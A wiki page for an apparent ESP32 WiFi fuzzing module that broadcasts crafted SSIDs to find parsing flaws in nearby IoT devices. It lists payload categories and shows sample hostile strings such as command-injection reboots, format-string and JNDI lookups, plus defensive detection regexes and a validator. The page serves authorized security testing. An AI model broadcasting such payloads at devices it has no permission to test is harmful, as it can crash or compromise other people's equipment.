
ciwzeroclick

7h30th3r0n3 edited this page Mar 14, 2026 · 1 revision

📡 CIW Zeroclick

SSID Injection Testing Framework for IoT & WiFi device security assessment.
Broadcasts crafted SSID payloads to detect parsing vulnerabilities, buffer overflows, and command injection flaws in nearby devices.

Based on CommandInWiFi-Zeroclick by V33RU.


🚀 Workflow

CIW Zeroclick Menu
        │
        ▼
[1] Select Categories → choose payload types (14 categories)
        │
        ▼
[2] Start Attack → loads payloads from SD, starts WiFi AP
        │
        ▼
[3] SSID Rotation → broadcasts each payload as AP name
        │
        ▼
[4] Device Monitoring → tracks connections & disconnections
        │
        ▼
[5] Crash Detection → alerts on quick disconnect (<10s)
        │
        ▼
[6] View Results → devices list & crash alerts

🎯 How It Works

WiFi devices constantly scan for available networks. When a device encounters an SSID, it must parse the network name to display it in its UI, store it in logs, or process it internally.

CIW Zeroclick exploits this by broadcasting specially crafted SSIDs containing:

  • Command injection sequences (|reboot|, $(cmd), `cmd`)
  • Buffer overflow patterns (oversized strings, boundary values)
  • Format string attacks (%s%s%s%s, %n%n%n)
  • Escape sequences (ANSI terminal escapes, control characters)
  • Serialization attacks (JSON/XML/YAML injection, SQL injection)
  • And more... (XSS, path traversal, CRLF, Log4Shell, NoSQL, heap spray)

If a device crashes, reboots, or disconnects abruptly after encountering a specific payload, it indicates a potential vulnerability in the device's SSID parsing logic.
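The same observation seen from the defender's side, as an added example that is not code from the CIW Zeroclick project: a small classifier that flags SSIDs in a scan or beacon log which match the payload classes listed above, so a wireless IDS or a device's own scan handler can log them safely instead of handing them to a shell, printf or terminal. The regex rules, the sample scan list and the `.invalid` hostname are constructed here; rule labels reuse the page's category names.

```python
import re

# Added example (not part of CIW Zeroclick): flag SSIDs from a scan or beacon
# log that match the payload classes this page lists. Rule labels reuse the
# page's category names; the patterns themselves are constructed here.
SSID_MAX_OCTETS = 32   # IEEE 802.11 SSID element limit

RULES = [
    ("wifi_cmd",    re.compile(r"[|;`]|\$\(|&&")),                     # shell metachars
    ("wifi_fmt",    re.compile(r"%\d*\$?[sdnxp]")),                    # printf specifiers
    ("wifi_esc",    re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")),  # ESC / control bytes
    ("wifi_jndi",   re.compile(r"\$\{jndi:", re.IGNORECASE)),
    ("wifi_path",   re.compile(r"\.\./|%2e%2e", re.IGNORECASE)),
    ("wifi_crlf",   re.compile(r"[\r\n]|%0[da]", re.IGNORECASE)),
    ("wifi_xss",    re.compile(r"<\s*(script|iframe|img)|\bon\w+\s*=", re.IGNORECASE)),
    ("wifi_serial", re.compile(r"^\s*[\[{]|'\s*(or|--)|<\?xml|\{\{", re.IGNORECASE)),
]

def classify_ssid(ssid: str) -> list:
    """Return the payload categories an SSID matches; [] means it looks benign."""
    hits = []
    if len(ssid.encode("utf-8")) > SSID_MAX_OCTETS:
        hits.append("wifi_overflow")     # longer than any valid 802.11 SSID
    for label, rx in RULES:
        if rx.search(ssid):
            hits.append(label)
    return hits

def scan_report(ssids) -> dict:
    """Map each suspicious SSID to its categories; benign names are left out."""
    return {s: cats for s in ssids if (cats := classify_ssid(s))}

# Constructed sample scan: two ordinary networks plus strings shaped like the
# page's wifi_cmd, wifi_fmt, wifi_esc, wifi_jndi and wifi_overflow payloads.
SAMPLE_SCAN = [
    "HomeWiFi-5G",
    "Cafe Guest",
    "|reboot|",
    "%s%s%s%s",
    "\x1b[2J\x1b[H",
    "${jndi:ldap://example.invalid/a}",
    "A" * 40,
]

if __name__ == "__main__":
    for ssid, cats in scan_report(SAMPLE_SCAN).items():
        print(repr(ssid), "->", ", ".join(cats))
```

A device that only ever treats the SSID as opaque bytes of at most 32 octets, and escapes it before display or logging, has nothing for these strings to reach; the classifier is for spotting that someone nearby is testing that assumption.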


📦 Payload Categories (14)

 #   Category        Count  Description
 1   wifi_cmd           25  Command injection (pipe, backtick, subshell, semicolon)
 2   wifi_overflow      26  Buffer overflow (oversized, boundary, null-fill, patterns)
 3   wifi_fmt           15  Format string (%s, %n, %x, %p, positional)
 4   wifi_probe         14  Encoding probes (null bytes, UTF-8 edge cases, BOM, RTL)
 5   wifi_esc            8  Terminal escape sequences (ANSI clear, OSC title, color)
 6   wifi_serial        13  Serialization attacks (JSON, XML, SQL, YAML, SSTI, DDE)
 7   wifi_enc            8  Encoding bypasses (fullwidth Unicode, URL-encoding, HTML entities)
 8   wifi_chain          8  Multi-SSID chained attacks (split payloads across rotations)
 9   wifi_heap           8  Heap exploitation patterns (dlmalloc, canaries, spray)
10   wifi_xss            8  Cross-site scripting (script tags, event handlers, iframe)
11   wifi_path           6  Path traversal (../../../, URL-encoded, /proc/self)
12   wifi_crlf           6  HTTP header injection (Set-Cookie, Location, smuggling)
13   wifi_jndi           6  Log4Shell / JNDI (LDAP, DNS, RMI, env leak)
14   wifi_nosql          6  NoSQL / LDAP injection (MongoDB operators, LDAP filter)
     Total             157

📱 Cardputer UI

Main Menu

  • Select Categories → toggle individual categories on/off with checkboxes
  • [START] Attack → load payloads and begin broadcasting
  • View Devices → list of devices that connected during broadcast
  • View Alerts → crash alerts (devices that disconnected in <10 seconds)
  • Set Rotation → configure SSID rotation interval (1–3600 seconds, default 5s)

Broadcast Screen

CIW Broadcasting

SSID: |reboot|
Payload: 3/157   Cat: wifi_cmd
Devices: 2   Alerts: 1
Next: 3s

;/. prev/next BS stop


🌐 Web Dashboard

Accessible from the Admin Console (/evil-menu → CIW Zeroclick) or directly at /ciw.

  • Category selector — click to toggle categories before deploying
  • Start / Stop — control broadcast remotely
  • Live status — current SSID, payload index, device count, alert count
  • Devices panel — MAC addresses + triggering SSID for each connected device
  • Alerts panel — crash alerts with MAC, SSID, and disconnect duration

Web API Endpoints

Method  Endpoint                         Description
GET     /ciw                             Dashboard HTML page
GET     /api/ciw/payloads                List all payloads (JSON)
GET     /api/ciw/payloads?cat=wifi_cmd   Filter by category
POST    /api/ciw/deploy                  Start broadcast (body: cats=wifi_cmd,wifi_fmt)
POST    /api/ciw/stop                    Stop broadcast
GET     /api/ciw/status                  Current status (JSON)
GET     /api/ciw/devices                 Connected devices (JSON)
GET     /api/ciw/alerts                  Crash alerts (JSON)

💻 Serial Commands

Command     Description
ciw_start   Load payloads and start broadcasting
ciw_stop    Stop broadcast
ciw_status  Show current status (broadcasting, payload index, devices, alerts)

📁 SD Card Structure

/evil/
  └── ciw/
       └── payloads.json    ← 157 default payloads (auto-created on first use)

The payloads.json file is automatically generated on first launch if not present.
You can also edit it manually to add custom payloads. Format:

[
  {"t":"|reboot|", "c":"wifi_cmd", "d":"Pipe operator reboot"},
  {"t":"AAAA...","c":"wifi_overflow","d":"32-byte A fill"},
  ...
]
  • t — payload text (used as SSID, max 32 chars)
  • c — category name (must match one of the 14 categories)
  • d — description (for reference only)
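An added validator for a hand-edited payloads.json (not part of the project's firmware), for checking the file on a workstation before it is copied to the SD card. It enforces the three fields above, the 14 category names, and the SSID length limit measured in UTF-8 bytes, because the 802.11 SSID element carries at most 32 octets; the sample JSON is constructed.

```python
import json

# Added example (not the CIW Zeroclick firmware): lint a payloads.json before
# it goes to /evil/ciw/, so bad entries are caught on the bench, not on air.
CATEGORIES = {
    "wifi_cmd", "wifi_overflow", "wifi_fmt", "wifi_probe", "wifi_esc",
    "wifi_serial", "wifi_enc", "wifi_chain", "wifi_heap", "wifi_xss",
    "wifi_path", "wifi_crlf", "wifi_jndi", "wifi_nosql",
}
SSID_MAX_OCTETS = 32   # 802.11 SSID element limit; count bytes, not characters

def validate_payloads(text: str) -> list:
    """Return human-readable problems; an empty list means the file is usable."""
    try:
        entries = json.loads(text)
    except json.JSONDecodeError as err:
        return [f"not valid JSON: {err}"]
    if not isinstance(entries, list):
        return ["top level must be a JSON array"]
    problems, seen = [], set()
    for i, e in enumerate(entries):
        where = f"entry {i}"
        if not isinstance(e, dict) or not all(k in e for k in ("t", "c")):
            problems.append(f"{where}: needs keys t and c")
            continue
        t, c = e["t"], e["c"]
        if not isinstance(t, str) or not t:
            problems.append(f"{where}: t must be a non-empty string")
        elif len(t.encode("utf-8")) > SSID_MAX_OCTETS:
            problems.append(f"{where}: t is {len(t.encode('utf-8'))} bytes, limit {SSID_MAX_OCTETS}")
        elif t in seen:
            problems.append(f"{where}: duplicate payload {t!r}")   # wastes a rotation slot
        else:
            seen.add(t)
        if c not in CATEGORIES:
            problems.append(f"{where}: unknown category {c!r}")
    return problems

# Constructed sample: one good entry, one oversized SSID, one misspelled category.
SAMPLE = '''[
  {"t":"|reboot|", "c":"wifi_cmd", "d":"Pipe operator reboot"},
  {"t":"''' + "A" * 40 + '''", "c":"wifi_overflow", "d":"40-byte A fill"},
  {"t":"%n%n%n", "c":"wifi_format", "d":"category name does not exist"}
]'''

if __name__ == "__main__":
    for p in validate_payloads(SAMPLE) or ["payloads.json OK"]:
        print(p)
```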

🔍 Crash Detection

When a device connects to the broadcast AP and disconnects within 10 seconds, it is flagged as a potential crash:

  • The LED turns red momentarily
  • An alert entry is created with the device MAC, triggering SSID, and disconnect duration
  • Up to 10 alerts are stored in a circular buffer
  • Alerts are visible on the Cardputer screen, web dashboard, and serial output

Note: A quick disconnect does not guarantee a crash — the device may have simply moved away or rejected the AP. Further investigation (device logs, firmware analysis) is needed to confirm the root cause.
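The heuristic described above, as an added desktop simulation that is not the firmware's code: stations are tracked by MAC together with the payload on the air when they associated, a disconnect inside the 10 s window raises an alert, and alerts live in a 10-entry ring buffer. The event timeline and MAC addresses are constructed.

```python
from collections import deque

# Added example (not the CIW Zeroclick firmware): the quick-disconnect heuristic
# this page describes, replayed over constructed association events.
CRASH_WINDOW_MS = 10_000   # disconnect within 10 s of connecting
MAX_ALERTS = 10            # circular buffer: the oldest alert is dropped first

class CrashDetector:
    def __init__(self):
        self.current_ssid = None                 # payload currently on the air
        self.connected = {}                      # mac -> (ssid seen, connect time)
        self.alerts = deque(maxlen=MAX_ALERTS)   # (mac, ssid, duration_ms)

    def connect(self, mac, t_ms):
        # remember which payload was being broadcast when the station associated
        self.connected[mac] = (self.current_ssid, t_ms)

    def disconnect(self, mac, t_ms):
        """Return (mac, ssid, duration_ms) if this looks like a crash, else None."""
        if mac not in self.connected:
            return None                          # never saw it associate
        ssid, t0 = self.connected.pop(mac)
        dur = t_ms - t0
        if dur >= CRASH_WINDOW_MS:
            return None                          # ordinary session length
        alert = (mac, ssid, dur)
        self.alerts.append(alert)
        return alert

def replay(events):
    """Feed (ms, kind, value) events to a detector; return alerts raised, in order."""
    det, raised = CrashDetector(), []
    for t, kind, value in events:
        if kind == "rotate":
            det.current_ssid = value
        elif kind == "connect":
            det.connect(value, t)
        elif kind == "disconnect" and (a := det.disconnect(value, t)):
            raised.append(a)
    return raised

# Constructed timeline: the first station stays on |reboot| for 30 s (no alert);
# the second joins while `reboot` is on the air and drops after 847 ms.
EVENTS = [
    (0,     "rotate",     "|reboot|"),
    (500,   "connect",    "AA:BB:CC:DD:EE:FF"),
    (5000,  "rotate",     "&reboot&"),
    (10000, "rotate",     "`reboot`"),
    (10200, "connect",    "11:22:33:44:55:66"),
    (11047, "disconnect", "11:22:33:44:55:66"),
    (30500, "disconnect", "AA:BB:CC:DD:EE:FF"),
]
```

Because the alert records the SSID that was on the air at association time rather than at disconnect time, a station that drops just after a rotation is still attributed to the payload it actually saw.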


⌨️ Keyboard Shortcuts

Context    Keys       Action
Menu       ; / .      Navigate up / down
Menu       Enter      Select / toggle category
Menu       Backspace  Back to main menu
Broadcast  ; / .      Previous / next payload (manual)
Broadcast  Backspace  Stop broadcast and return
Rotation   0-9        Type interval value
Rotation   Enter      Confirm interval

📑 Example Serial Output

CIW: Created default payloads.json on SD
CIW: Loaded 157 payloads
CIW: Broadcasting started - 157 payloads
CIW: First SSID: |reboot|
CIW: Rotated to [2/157] &reboot&
CIW: Device connected AA:BB:CC:DD:EE:FF
CIW: Rotated to [3/157] `reboot`
CIW: ALERT crash detected! Duration: 847ms
CIW: Rotated to [4/157] $reboot$
CIW: Broadcasting stopped

⚖️ Disclaimer

This module is designed for authorized security testing and research only.
It evaluates device behavior under abnormal WiFi SSID input conditions.
Use ethically, legally, and only on devices you own or have written authorization to test.
Unauthorized wireless interference may be illegal in your jurisdiction.


❓ FAQ

Will this actually hack/exploit devices?

No. CIW Zeroclick is a detection tool, not an exploit framework. It broadcasts strings that would be dangerous if a device passes SSIDs to a shell or parser unsanitized. It detects behavioral anomalies (crash, reboot, disconnect) — confirming root cause requires separate device-side analysis.

Can I add my own custom payloads?

Yes. Edit /evil/ciw/payloads.json on the SD card. Add entries in the format {"t":"your_payload","c":"wifi_cmd","d":"description"}. The category must be one of the 14 predefined categories. SSIDs are limited to 32 characters.

Why does the broadcast stop other WiFi features?

CIW uses the ESP32 in AP mode to broadcast the crafted SSIDs. This replaces any active captive portal or AP. When you stop the broadcast, WiFi mode is restored to APSTA.

What devices are most likely to be affected?

IoT devices, embedded systems, routers, and older firmware implementations that parse SSIDs without proper input sanitization are most susceptible. Modern smartphones and laptops generally handle malformed SSIDs safely.

How does chained mode (wifi_chain) work?

Some payloads are split across multiple SSIDs. If a device caches and concatenates SSIDs from sequential scans (e.g., in a log file), the combined result forms a complete attack string. This tests for persistent storage injection rather than single-parse vulnerabilities.
